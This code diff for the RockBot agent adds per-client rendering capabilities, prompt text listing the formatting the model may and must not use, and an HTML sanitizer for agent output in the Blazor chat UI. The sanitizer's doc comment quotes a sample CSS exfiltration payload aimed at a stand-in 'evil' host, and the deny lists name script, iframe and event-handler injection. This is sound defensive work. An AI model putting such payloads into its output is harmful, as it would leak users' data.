+        // None / bare Text / unknown-bits-only → no special instructions.
+        if ((caps & ClientCapabilityMasks.AnyMeaningful) == 0)
+            return null;
+
+        var allow = new List<string>(8);
+        var deny = new List<string>(8);
+
+        // ── Markdown subset ────────────────────────────────────────────────
+        if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            allow.Add("**bold**, *italic*, `inline code`, and blockquotes");
+        else
+            deny.Add("any markdown formatting — emit plain text only");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownHeadings))
+            allow.Add("`#` / `##` / `###` headings");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("headings — the client renders `#` as a literal character");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownTables))
+            allow.Add("GFM-style tables (`| col | col |`)");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("tables — present tabular data as a bulleted or numbered list");
+
+        if (caps.HasFlag(ClientCapabilities.MarkdownCode))
+            allow.Add("fenced code blocks with a language hint (```` ```python ````)");
+
+        if (caps.HasFlag(ClientCapabilities.LinkInline))
+            allow.Add("inline links — `[text](https://...)`");
+        else if (caps.HasFlag(ClientCapabilities.MarkdownBasic))
+            deny.Add("`[text](url)` syntax — paste bare URLs so the client auto-links them");
+
+        // ── Rich rendering ────────────────────────────────────────────────
+        if (caps.HasFlag(ClientCapabilities.HtmlInline))
+        {
+            allow.Add(
+                "a safe subset of inline HTML embedded in markdown for color or structure: " +
+                "`<span style=\"color:#...\">…</span>`, `<table>`, `<details><summary>…</summary>…</details>`");
+            deny.Add(
+                "`<script>`, `<iframe>`, `<style>`, event handlers (`onclick`, `onerror`, …), " +
+                "or external `<img src>` to untrusted hosts (the client sanitizer strips these anyway)");
+        }
+
+        if (caps.HasFlag(ClientCapabilities.SvgInline))
+            allow.Add("inline `<svg>` for simple charts (no `<script>`, keep under ~500 lines)");
+
+        if (caps.HasFlag(ClientCapabilities.ImageAttachment))
+            allow.Add("image attachments (PNG/JPEG) when a rendered chart conveys more than prose");
+
+        // ── Platform-native UI (future) ───────────────────────────────────
+        var nativeUi = caps & ClientCapabilityMasks.NativeUi;
+        if (nativeUi != 0)
+            allow.Add($"platform-native UI primitives ({nativeUi}) — use the matching tool if available");
+
+        // ── Assemble ──────────────────────────────────────────────────────
+        var sb = new StringBuilder("Rendering capabilities of the client receiving your reply:");
+        if (allow.Count > 0)
+        {
+            sb.AppendLine().Append("You MAY use:");
+            foreach (var line in allow) sb.AppendLine().Append("- ").Append(line);
+        }
+        if (deny.Count > 0)
+        {
+            sb.AppendLine().Append("You MUST NOT use:");
+            foreach (var line in deny) sb.AppendLine().Append("- ").Append(line);
+        }
+        sb.AppendLine().Append(
+            "Plain markdown remains the default — reach for richer rendering only when it materially improves clarity.");
+
+        return sb.ToString();
+    }
+}
+
+internal static class ClientCapabilityMasks
+{
+    /// <summary>Every bit that, when set, changes the prompt output.</summary>
+    public const ClientCapabilities AnyMeaningful =
+        ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.HtmlInline |
+        ClientCapabilities.SvgInline | ClientCapabilities.ImageAttachment |
+        NativeUi;
+
+    public const ClientCapabilities NativeUi =
+        ClientCapabilities.DiscordEmbed | ClientCapabilities.SlackBlockKit |
+        ClientCapabilities.TeamsAdaptiveCard;
+}

--- a/src/RockBot.Host/SchedulerService.cs
+++ b/src/RockBot.Host/SchedulerService.cs
@@ -223,7 +223,7 @@ internal sealed class SchedulerService : IHostedService, ISchedulerService
             _logger.LogInformation("Firing scheduled task '{Name}'", task.Name);
             try
             {
-                var message = new ScheduledTaskMessage(task.Name, task.Description, task.IsSystemTask);
+                var message = new ScheduledTaskMessage(task.Name, task.Description, task.IsSystemTask, task.ClientCapabilities);
                 var envelope = message.ToEnvelope(source: _identity.Name);
                 // Pass the slot's cancellation token so the handler (and the LLM
                 // loop it drives) stops cleanly when a user message arrives.

--- a/src/RockBot.Host/ServiceCollectionExtensions.cs
+++ b/src/RockBot.Host/ServiceCollectionExtensions.cs
@@ -41,6 +41,7 @@ public static class ServiceCollectionExtensions
         services.AddTransient<AgentLoopRunner>();
         services.AddScoped<AgentContextBuilder>();
         services.AddSingleton<SessionStartTracker>();
+        services.AddSingleton<SessionClientCapabilityStore>();
         services.AddSingleton<IUserActivityMonitor, UserActivityMonitor>();
         services.AddSingleton<ISessionTracker, SessionBackgroundTaskTracker>();
         services.AddSingleton<IAgentWorkSerializer, AgentWorkSerializer>();

--- a/src/RockBot.Host/SessionClientCapabilityStore.cs
+++ b/src/RockBot.Host/SessionClientCapabilityStore.cs
@@ -1,0 +1,63 @@
+using RockBot.UserProxy;
+
+namespace RockBot.Host;
+
+/// <summary>
+/// In-memory cache of the currently-active rendering capabilities for each user
+/// session. Written on every inbound <see cref="UserMessage"/> arrival (last
+/// writer wins, so a user that switches clients mid-conversation flips the
+/// cached capability on their next turn). Read by entry points that produce
+/// user-facing replies but don't have the originating <see cref="UserMessage"/>
+/// in scope — A2A handlers, subagent runner. Cleared by
+/// <see cref="ClearContextHandler"/> when the user resets the session.
+/// <para>
+/// This is intentionally separate from <see cref="ISessionTracker"/> /
+/// <see cref="SessionBackgroundTaskTracker"/>: that tracks per-loop cancellation
+/// generations and clears entries on <c>EndSession</c>; capability metadata must
+/// persist across loops (A2A callbacks may fire long after the user's loop
+/// completes). Singleton; lifetime spans the agent process.
+/// </para>
+/// </summary>
+public sealed class SessionClientCapabilityStore
+{
+    private readonly Dictionary<string, ClientCapabilities> _byId
+        = new(StringComparer.OrdinalIgnoreCase);
+    private readonly Lock _lock = new();
+
+    /// <summary>
+    /// Set or replace the cached capability for <paramref name="sessionId"/>.
+    /// Passing <see cref="ClientCapabilities.None"/> removes the entry —
+    /// preserves the invariant that a missing entry and a <c>None</c>-only
+    /// entry behave identically.
+    /// </summary>
+    public void Set(string sessionId, ClientCapabilities caps)
+    {
+        lock (_lock)
+        {
+            if (caps == ClientCapabilities.None)
+                _byId.Remove(sessionId);
+            else
+                _byId[sessionId] = caps;
+        }
+    }
+
+    /// <summary>
+    /// Returns the cached capability, or <see cref="ClientCapabilities.None"/>
+    /// if the session has not advertised one.
+    /// </summary>
+    public ClientCapabilities Get(string sessionId)
+    {
+        lock (_lock)
+            return _byId.GetValueOrDefault(sessionId);
+    }
+
+    /// <summary>
+    /// Remove any cached entry for <paramref name="sessionId"/>. Called from
+    /// <c>ClearContextHandler</c> when the user resets the conversation.
+    /// </summary>
+    public void Clear(string sessionId)
+    {
+        lock (_lock)
+            _byId.Remove(sessionId);
+    }
+}

--- a/src/RockBot.Subagent/SubagentRunner.cs
+++ b/src/RockBot.Subagent/SubagentRunner.cs
@@ -31,6 +31,7 @@ internal sealed class SubagentRunner(
     AgentIdentity agent,
     TierRoutingLogger tierRoutingLogger,
     AgentProfile agentProfile,
+    SessionClientCapabilityStore clientCapabilityStore,
     ILogger<SubagentRunner> logger,
     ISkillResourceUsageStore? skillResourceUsageStore = null,
     ISessionA2AAwaiter? a2aAwaiter = null)
@@ -99,10 +100,20 @@ internal sealed class SubagentRunner(
         // Use AgentContextBuilder for the full context: system prompt, datetime, rules,
         // model guardrails, long-term memory recall, skill/service hints, working memory.
         // The subagent session has no conversation history, so that section is a no-op.
+        //
+        // primarySessionId is the WM namespace (e.g. "session/blazor-session") for user
+        // sessions; the capability stash is keyed by raw session id (e.g. "blazor-session").
+        // Strip the "session/" prefix to match — for non-user origins (subagent/wisp) the
+        // lookup naturally misses and returns None.
+        const string SessionPrefix = "session/";
+        var primaryRawSessionId = primarySessionId.StartsWith(SessionPrefix, StringComparison.OrdinalIgnoreCase)
+            ? primarySessionId[SessionPrefix.Length..]
+            : primarySessionId;
         var chatMessages = await agentContextBuilder.BuildAsync(
             subagentSessionId, description, ct,
             workingMemoryNamespace: subagentNamespace,
-            systemPromptOverride: systemPrompt);
+            systemPromptOverride: systemPrompt,
+            clientCapabilities: clientCapabilityStore.Get(primaryRawSessionId));
 
         if (!string.IsNullOrEmpty(context))
             chatMessages.Add(new ChatMessage(ChatRole.System, $"Context: {context}"));

--- a/src/RockBot.Tools.Scheduling/ScheduleTaskExecutor.cs
+++ b/src/RockBot.Tools.Scheduling/ScheduleTaskExecutor.cs
@@ -106,7 +106,8 @@ internal sealed class ScheduleTaskExecutor(ISchedulerService scheduler, AgentClo
             "markdown" =>
                 ClientCapabilities.Text | ClientCapabilities.MarkdownBasic |
                 ClientCapabilities.MarkdownHeadings | ClientCapabilities.MarkdownTables |
-                ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline,
+                ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+                ClientCapabilities.MarkdownStrikethrough,
             "rich" => ClientCapabilityPresets.Blazor,
             _ => ClientCapabilities.None,
         };

--- a/src/RockBot.Tools.Scheduling/ScheduleTaskExecutor.cs
+++ b/src/RockBot.Tools.Scheduling/ScheduleTaskExecutor.cs
@@ -1,6 +1,7 @@
 using System.Text.Json;
 using RockBot.Host;
 using RockBot.Tools;
+using RockBot.UserProxy;
 
 namespace RockBot.Tools.Scheduling;
 
@@ -13,6 +14,7 @@ internal sealed class ScheduleTaskExecutor(ISchedulerService scheduler, AgentClo
     {
         string name, cron, description;
         bool runOnce;
+        ClientCapabilities capabilities;
         try
         {
             var args = ParseArgs(request.Arguments);
@@ -20,6 +22,7 @@ internal sealed class ScheduleTaskExecutor(ISchedulerService scheduler, AgentClo
             cron = GetRequired(args, "cron");
             description = GetRequired(args, "description");
             runOnce = GetOptionalBool(args, "runOnce");
+            capabilities = ParseOutputFormat(GetOptionalString(args, "outputFormat"));
         }
         catch (Exception ex)
         {
@@ -33,7 +36,8 @@ internal sealed class ScheduleTaskExecutor(ISchedulerService scheduler, AgentClo
                 CronExpression: cron,
                 Description: description,
                 CreatedAt: DateTimeOffset.UtcNow,
-                RunOnce: runOnce);
+                RunOnce: runOnce,
+                ClientCapabilities: capabilities);
 
             await scheduler.ScheduleAsync(task, ct);
 
@@ -73,9 +77,45 @@ internal sealed class ScheduleTaskExecutor(ISchedulerService scheduler, AgentClo
     private static bool GetOptionalBool(Dictionary<string, JsonElement> args, string key)
     {
         if (!args.TryGetValue(key, out var el)) return false;
-        return el.ValueKind == JsonValueKind.True;
+        return el.ValueKind switch
+        {
+            JsonValueKind.True => true,
+            JsonValueKind.False => false,
+            _ => false
+        };
     }
 
-    private static ToolInvokeResponse Error(ToolInvokeRequest request, string message) =>
-        new() { ToolCallId = request.ToolCallId, ToolName = request.ToolName, Content = message, IsError = true };
+    private static string? GetOptionalString(Dictionary<string, JsonElement> args, string key)
+    {
+        if (!args.TryGetValue(key, out var el)) return null;
+        return el.ValueKind == JsonValueKind.String ? el.GetString() : null;
+    }
+
+    /// <summary>
+    /// Maps a tool-friendly outputFormat string to a <see cref="ClientCapabilities"/> bitfield.
+    /// Three presets:
+    /// <list type="bullet">
+    /// <item><c>"plain"</c> / null / unrecognised → <see cref="ClientCapabilities.None"/></item>
+    /// <item><c>"markdown"</c> → headings, tables, code, links — the universal rich-text set</item>
+    /// <item><c>"rich"</c> → <see cref="ClientCapabilityPresets.Blazor"/> (HTML + SVG)</item>
+    /// </list>
+    /// </summary>
+    internal static ClientCapabilities ParseOutputFormat(string? format) =>
+        format?.Trim().ToLowerInvariant() switch
+        {
+            "markdown" =>
+                ClientCapabilities.Text | ClientCapabilities.MarkdownBasic |
+                ClientCapabilities.MarkdownHeadings | ClientCapabilities.MarkdownTables |
+                ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline,
+            "rich" => ClientCapabilityPresets.Blazor,
+            _ => ClientCapabilities.None,
+        };
+
+    private static ToolInvokeResponse Error(ToolInvokeRequest request, string message) => new()
+    {
+        ToolCallId = request.ToolCallId,
+        ToolName = request.ToolName,
+        Content = message,
+        IsError = true
+    };
 }

--- a/src/RockBot.Tools.Scheduling/SchedulingToolRegistrar.cs
+++ b/src/RockBot.Tools.Scheduling/SchedulingToolRegistrar.cs
@@ -33,6 +33,11 @@ internal sealed class SchedulingToolRegistrar(
             "runOnce": {
               "type": "boolean",
               "description": "Set to true for one-time tasks (reminders, deferred actions). The task is automatically deleted after it fires. Omit or set false for recurring tasks."
+            },
+            "outputFormat": {
+              "type": "string",
+              "enum": ["plain", "markdown", "rich"],
+              "description": "Rendering format the task's output is authored for. 'plain' (default) emits plain text. 'markdown' permits headings, tables, code blocks, links. 'rich' additionally permits inline HTML for color and inline SVG for charts — use only for tasks whose audience will read the output in a client that renders HTML (e.g. the Blazor UI). Persists with the schedule; ignored on CLI/text-only clients."
             }
           },
           "required": ["name", "cron", "description"]

--- a/src/RockBot.UserProxy.Abstractions/ClientCapabilities.cs
+++ b/src/RockBot.UserProxy.Abstractions/ClientCapabilities.cs
@@ -13,12 +13,14 @@ public enum ClientCapabilities : ulong
     None              = 0,
 
     // Text + markdown subsets (bits 0–15)
-    Text              = 1UL << 0,    // implicit floor — every client supports this
-    MarkdownBasic     = 1UL << 1,    // bold, italic, inline code, blockquotes
-    MarkdownHeadings  = 1UL << 2,    // # / ## / ###
-    MarkdownTables    = 1UL << 3,    // GFM tables
-    MarkdownCode      = 1UL << 4,    // fenced code blocks with language hint
-    LinkInline        = 1UL << 5,    // [text](url) renders as a clickable link
+    Text                  = 1UL << 0,    // implicit floor — every client supports this
+    MarkdownBasic         = 1UL << 1,    // bold, italic, inline code, blockquotes
+    MarkdownHeadings      = 1UL << 2,    // # / ## / ###
+    MarkdownTables        = 1UL << 3,    // GFM tables
+    MarkdownCode          = 1UL << 4,    // fenced code blocks with language hint
+    LinkInline            = 1UL << 5,    // [text](url) renders as a clickable link
+    MarkdownStrikethrough = 1UL << 6,    // ~~text~~ — GFM, supported by most chat platforms
+    MarkdownTaskList      = 1UL << 7,    // - [ ] / - [x] checkboxes — Markdig advanced + Teams
 
     // Rich rendering (bits 16–31)
     HtmlInline        = 1UL << 16,   // sanitized HTML inside markdown
@@ -45,23 +47,28 @@ public static class ClientCapabilityPresets
     public const ClientCapabilities Blazor =
         ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
         ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.MarkdownStrikethrough | ClientCapabilities.MarkdownTaskList |
         ClientCapabilities.HtmlInline | ClientCapabilities.SvgInline;
 
     // Documented in advance so capability-vocabulary decisions stay coherent —
     // not used by code until those proxies ship.
     public const ClientCapabilities WhatsApp =
-        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.ImageAttachment;
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic |
+        ClientCapabilities.MarkdownStrikethrough | ClientCapabilities.ImageAttachment;
 
     public const ClientCapabilities Discord =
         ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
-        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+        ClientCapabilities.LinkInline | ClientCapabilities.MarkdownStrikethrough |
+        ClientCapabilities.ImageAttachment;
 
     public const ClientCapabilities Slack =
         ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
-        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+        ClientCapabilities.LinkInline | ClientCapabilities.MarkdownStrikethrough |
+        ClientCapabilities.ImageAttachment;
 
     public const ClientCapabilities Teams =
         ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
         ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.MarkdownStrikethrough | ClientCapabilities.MarkdownTaskList |
         ClientCapabilities.ImageAttachment;
 }

--- a/src/RockBot.UserProxy.Abstractions/ClientCapabilities.cs
+++ b/src/RockBot.UserProxy.Abstractions/ClientCapabilities.cs
@@ -1,0 +1,67 @@
+namespace RockBot.UserProxy;
+
+/// <summary>
+/// Rendering capabilities the receiving client advertises. Treat as a forward-compatible
+/// bitfield — bits added later by newer proxies appear as unknown values on older agents
+/// and are safely ignored by <see cref="Enum.HasFlag(Enum)"/> and mask checks. Bit
+/// layout leaves gaps so growth is organized: text formatting in bits 0–15, rich
+/// rendering in bits 16–31, platform-native UI primitives in bits 32–47.
+/// </summary>
+[Flags]
+public enum ClientCapabilities : ulong
+{
+    None              = 0,
+
+    // Text + markdown subsets (bits 0–15)
+    Text              = 1UL << 0,    // implicit floor — every client supports this
+    MarkdownBasic     = 1UL << 1,    // bold, italic, inline code, blockquotes
+    MarkdownHeadings  = 1UL << 2,    // # / ## / ###
+    MarkdownTables    = 1UL << 3,    // GFM tables
+    MarkdownCode      = 1UL << 4,    // fenced code blocks with language hint
+    LinkInline        = 1UL << 5,    // [text](url) renders as a clickable link
+
+    // Rich rendering (bits 16–31)
+    HtmlInline        = 1UL << 16,   // sanitized HTML inside markdown
+    SvgInline         = 1UL << 17,   // inline <svg>
+    ImageAttachment   = 1UL << 18,   // out-of-band image binaries
+
+    // Platform-native UI primitives, reserved for future proxies (bits 32–47)
+    DiscordEmbed      = 1UL << 32,
+    SlackBlockKit     = 1UL << 33,
+    TeamsAdaptiveCard = 1UL << 34,
+}
+
+/// <summary>
+/// Conventional capability sets for each proxy implementation. Proxies declare their
+/// preset on every outbound <see cref="UserMessage"/>; older proxies that don't set
+/// the field default to <see cref="ClientCapabilities.None"/>, which falls through
+/// to the agent's markdown-only behaviour.
+/// </summary>
+public static class ClientCapabilityPresets
+{
+    public const ClientCapabilities Cli =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode;
+
+    public const ClientCapabilities Blazor =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.HtmlInline | ClientCapabilities.SvgInline;
+
+    // Documented in advance so capability-vocabulary decisions stay coherent —
+    // not used by code until those proxies ship.
+    public const ClientCapabilities WhatsApp =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Discord =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Slack =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownCode |
+        ClientCapabilities.LinkInline | ClientCapabilities.ImageAttachment;
+
+    public const ClientCapabilities Teams =
+        ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.MarkdownHeadings |
+        ClientCapabilities.MarkdownTables | ClientCapabilities.MarkdownCode | ClientCapabilities.LinkInline |
+        ClientCapabilities.ImageAttachment;
+}

--- a/src/RockBot.UserProxy.Abstractions/UserMessage.cs
+++ b/src/RockBot.UserProxy.Abstractions/UserMessage.cs
@@ -9,4 +9,15 @@ public sealed record UserMessage
     public required string SessionId { get; init; }
     public required string UserId { get; init; }
     public string? TargetAgent { get; init; }
+
+    /// <summary>
+    /// Rendering capabilities of the client originating this message. The agent
+    /// uses this to scope the rich-content subset it emits on the reply, and
+    /// caches the value per-session so other entry points (A2A callbacks,
+    /// subagent runs) producing replies for the same session can also honour it.
+    /// Default <see cref="ClientCapabilities.None"/> falls through to the agent's
+    /// markdown-only behaviour — older proxies that don't set this field keep
+    /// working unchanged.
+    /// </summary>
+    public ClientCapabilities ClientCapabilities { get; init; } = ClientCapabilities.None;
 }

--- a/src/RockBot.UserProxy.Blazor/Pages/Chat.razor
+++ b/src/RockBot.UserProxy.Blazor/Pages/Chat.razor
@@ -1,5 +1,4 @@
 @page "/"
-@using Markdig
 @using RockBot.UserProxy.Blazor.Services
 @using Microsoft.JSInterop
 @inject UserProxyService ProxyService
@@ -127,7 +126,7 @@
                         @if (message.IsExpanded)
                         {
                             <div class="message-content mt-2">
-                                @((MarkupString)ConvertMarkdownToHtml(message.Content))
+                                @((MarkupString)SafeMarkdownRenderer.RenderSafe(message.Content))
                             </div>
                             <div class="message-time">
                                 @TimeZoneInfo.ConvertTimeFromUtc(message.Timestamp, _displayZone).ToString("HH:mm:ss")
@@ -151,7 +150,7 @@
                             <div class="fw-bold small mb-2">@message.AgentName</div>
                         }
                         <div class="message-content mt-2">
-                            @((MarkupString)ConvertMarkdownToHtml(message.Content))
+                            @((MarkupString)SafeMarkdownRenderer.RenderSafe(message.Content))
                         </div>
                     </div>
                 </div>
@@ -166,7 +165,7 @@
                             <div class="@(message.IsInterim ? "fst-italic" : "fw-bold") small mb-2">@message.AgentName</div>
                         }
                         <div class="message-content">
-                            @((MarkupString)ConvertMarkdownToHtml(message.Content))
+                            @((MarkupString)SafeMarkdownRenderer.RenderSafe(message.Content))
                         </div>
                         <div class="message-time">
                             @TimeZoneInfo.ConvertTimeFromUtc(message.Timestamp, _displayZone).ToString("HH:mm:ss")
@@ -248,7 +247,7 @@
                         <small class="saved-item-meta">@_viewingItem.AgentName — @TimeZoneInfo.ConvertTime(_viewingItem.SavedAt, _displayZone).ToString("MMM d, yyyy h:mm tt")</small>
                     </div>
                     <div class="saved-view-content">
-                        @((MarkupString)Markdig.Markdown.ToHtml(_viewingItem.Content, MarkdownPipeline))
+                        @((MarkupString)SafeMarkdownRenderer.RenderSafe(_viewingItem.Content))
                     </div>
                     <div class="d-flex gap-2 mt-2">
                         <button class="btn btn-sm btn-secondary" @onclick="BackToSavedList">Back</button>
@@ -342,10 +341,6 @@
     private bool _showSavedModal;
     private IReadOnlyList<SavedResponseSummary>? _savedItems;
     private GetSavedResponseResponse? _viewingItem;
-
-    private static readonly MarkdownPipeline MarkdownPipeline = new MarkdownPipelineBuilder()
-        .UseAdvancedExtensions()
-        .Build();
 
     private string? _lastRenderedAgentName;
 
@@ -572,22 +567,6 @@
         // Take first line, truncate if needed
         var firstLine = text.Split('\n', 2)[0];
         return firstLine.Length <= maxLength ? firstLine : firstLine[..(maxLength - 1)] + "\u2026";
-    }
-
-    private string ConvertMarkdownToHtml(string markdown)
-    {
-        if (string.IsNullOrEmpty(markdown))
-            return string.Empty;
-
-        try
-        {
-            return Markdown.ToHtml(markdown, MarkdownPipeline);
-        }
-        catch
-        {
-            // Fallback to plain text if markdown parsing fails
-            return System.Net.WebUtility.HtmlEncode(markdown).Replace("\n", "<br/>");
-        }
     }
 
     private async Task ToggleDarkMode()

--- a/src/RockBot.UserProxy.Blazor/Pages/Chat.razor
+++ b/src/RockBot.UserProxy.Blazor/Pages/Chat.razor
@@ -489,7 +489,8 @@
         {
             Content = effectiveContent,
             SessionId = SessionId,
-            UserId = UserId
+            UserId = UserId,
+            ClientCapabilities = ClientCapabilityPresets.Blazor
         };
 
         var progressTracker = new Progress<AgentReply>(reply =>

--- a/src/RockBot.UserProxy.Blazor/RockBot.UserProxy.Blazor.csproj
+++ b/src/RockBot.UserProxy.Blazor/RockBot.UserProxy.Blazor.csproj
@@ -8,6 +8,7 @@
   </PropertyGroup>
 
   <ItemGroup>
+    <PackageReference Include="HtmlSanitizer" Version="9.*" />
     <PackageReference Include="Markdig" Version="0.41.*" />
   </ItemGroup>
 

--- a/src/RockBot.UserProxy.Blazor/Services/SafeMarkdownRenderer.cs
+++ b/src/RockBot.UserProxy.Blazor/Services/SafeMarkdownRenderer.cs
@@ -1,0 +1,154 @@
+using Ganss.Xss;
+using Markdig;
+
+namespace RockBot.UserProxy.Blazor.Services;
+
+/// <summary>
+/// Renders agent-emitted markdown into HTML that's safe to drop into the DOM via
+/// <see cref="Microsoft.AspNetCore.Components.MarkupString"/>. Pipes Markdig output
+/// through <see cref="HtmlSanitizer"/> with an allowlist tight enough to deny:
+/// <list type="bullet">
+/// <item><c>&lt;script&gt;</c>, <c>&lt;iframe&gt;</c>, <c>&lt;style&gt;</c>, and event handlers (<c>onclick</c>, etc.)</item>
+/// <item><c>javascript:</c> / <c>data:</c> / <c>vbscript:</c> URL schemes</item>
+/// <item><c>url(...)</c> values inside CSS — blocks data-exfil via <c>background:url(https://evil/leak?...)</c></item>
+/// <item>UI-hijack CSS — <c>position</c>, <c>z-index</c>, fixed <c>width/height/top/left</c>, <c>transform</c>, <c>opacity</c></item>
+/// <item><c>&lt;foreignObject&gt;</c> inside SVG (would let HTML smuggle past the SVG perimeter)</item>
+/// </list>
+/// The allowlist matches the rich-content subset the agent is told it may emit
+/// via the <c>ClientCapabilities</c> system prompt: bold/italic/code, headings,
+/// tables, fenced code, inline links, strikethrough, GFM task lists, sanitized
+/// inline HTML for color and structure, and inline SVG for charts.
+/// </summary>
+public static class SafeMarkdownRenderer
+{
+    private static readonly MarkdownPipeline Pipeline = new MarkdownPipelineBuilder()
+        .UseAdvancedExtensions()
+        .Build();
+
+    private static readonly HtmlSanitizer Sanitizer = BuildSanitizer();
+
+    /// <summary>
+    /// Renders <paramref name="markdown"/> to sanitized HTML. Returns
+    /// <see cref="string.Empty"/> for null/empty input. On any Markdig parsing
+    /// exception, falls back to a plain-text-with-&lt;br&gt; rendering that's
+    /// itself HTML-encoded — never returns unsafe markup.
+    /// </summary>
+    public static string RenderSafe(string? markdown)
+    {
+        if (string.IsNullOrEmpty(markdown))
+            return string.Empty;
+
+        string html;
+        try
+        {
+            html = Markdown.ToHtml(markdown, Pipeline);
+        }
+        catch
+        {
+            // Fallback: encode literally, preserve line breaks. No sanitizer needed
+            // because the input is fully encoded.
+            return System.Net.WebUtility.HtmlEncode(markdown).Replace("\n", "<br/>");
+        }
+
+        return Sanitizer.Sanitize(html);
+    }
+
+    private static HtmlSanitizer BuildSanitizer()
+    {
+        var s = new HtmlSanitizer();
+
+        // ── Tags ──────────────────────────────────────────────────────────
+        // Start from the library default, then add the rich subset we permit.
+        // Inline SVG and task-list <input> are off by default and need explicit
+        // opt-in.
+        s.AllowedTags.Add("svg");
+        s.AllowedTags.Add("g");
+        s.AllowedTags.Add("path");
+        s.AllowedTags.Add("rect");
+        s.AllowedTags.Add("circle");
+        s.AllowedTags.Add("ellipse");
+        s.AllowedTags.Add("line");
+        s.AllowedTags.Add("polyline");
+        s.AllowedTags.Add("polygon");
+        s.AllowedTags.Add("text");
+        s.AllowedTags.Add("tspan");
+        s.AllowedTags.Add("title");        // SVG <title> for hover tooltips
+        s.AllowedTags.Add("desc");
+        s.AllowedTags.Add("defs");
+        s.AllowedTags.Add("marker");
+        s.AllowedTags.Add("linearGradient");
+        s.AllowedTags.Add("radialGradient");
+        s.AllowedTags.Add("stop");
+        s.AllowedTags.Add("input");        // GFM task-list checkboxes
+
+        // <foreignObject> would smuggle arbitrary HTML inside SVG past most
+        // allowlists — strip it explicitly even though it isn't on by default.
+        s.AllowedTags.Remove("foreignObject");
+
+        // ── Attributes ────────────────────────────────────────────────────
+        s.AllowedAttributes.Add("style");
+        s.AllowedAttributes.Add("class");
+
+        // SVG geometry / appearance attributes
+        foreach (var attr in new[]
+        {
+            "viewBox", "preserveAspectRatio", "xmlns",
+            "x", "y", "x1", "y1", "x2", "y2",
+            "cx", "cy", "r", "rx", "ry",
+            "d", "points", "transform",
+            "width", "height",
+            "fill", "stroke", "stroke-width", "stroke-linecap", "stroke-linejoin",
+            "stroke-dasharray", "opacity", "fill-opacity", "stroke-opacity",
+            "text-anchor", "font-family", "font-size", "font-weight",
+            "dx", "dy", "rotate",
+            "offset", "stop-color", "stop-opacity",
+            "gradientUnits", "gradientTransform",
+            "marker-start", "marker-mid", "marker-end",
+            "orient", "refX", "refY", "markerWidth", "markerHeight",
+        })
+        {
+            s.AllowedAttributes.Add(attr);
+        }
+
+        // GFM task-list <input> attributes — type + disabled + checked only.
+        s.AllowedAttributes.Add("type");
+        s.AllowedAttributes.Add("disabled");
+        s.AllowedAttributes.Add("checked");
+
+        // ── CSS properties — tight allowlist ──────────────────────────────
+        // Replace the default ~60-property allowlist with just the text-styling
+        // properties we actually need. Drops position/z-index/transform/opacity
+        // and width/height/top/left, which are the UI-hijack vectors.
+        s.AllowedCssProperties.Clear();
+        foreach (var prop in new[]
+        {
+            "color", "background-color",
+            "font-weight", "font-style", "font-size", "font-family",
+            "text-decoration", "text-align",
+            "padding", "padding-left", "padding-right", "padding-top", "padding-bottom",
+            "margin", "margin-left", "margin-right", "margin-top", "margin-bottom",
+            "border", "border-color", "border-style", "border-width", "border-radius",
+            "line-height",
+        })
+        {
+            s.AllowedCssProperties.Add(prop);
+        }
+
+        // ── URL schemes ───────────────────────────────────────────────────
+        s.AllowedSchemes.Clear();
+        s.AllowedSchemes.Add("http");
+        s.AllowedSchemes.Add("https");
+        s.AllowedSchemes.Add("mailto");
+
+        // ── CSS url() values ──────────────────────────────────────────────
+        // The library default already strips url(...) inside CSS values, which
+        // is the primary CSS-based data-exfil vector. The CSS-property allowlist
+        // above also excludes background-image / list-style-image / cursor where
+        // url() would normally appear, providing a second layer of defense.
+
+        // ── Misc ──────────────────────────────────────────────────────────
+        s.AllowDataAttributes = false;
+
+        return s;
+    }
+}

--- a/src/RockBot.UserProxy.Cli/ChatCommand.cs
+++ b/src/RockBot.UserProxy.Cli/ChatCommand.cs
@@ -57,7 +57,8 @@ internal sealed class ChatCommand : AsyncCommand<ChatCommand.Settings>
             Content = content,
             SessionId = settings.SessionId ?? "cli-session",
             UserId = settings.UserId ?? "cli-user",
-            TargetAgent = settings.TargetAgent
+            TargetAgent = settings.TargetAgent,
+            ClientCapabilities = ClientCapabilityPresets.Cli
         };
 
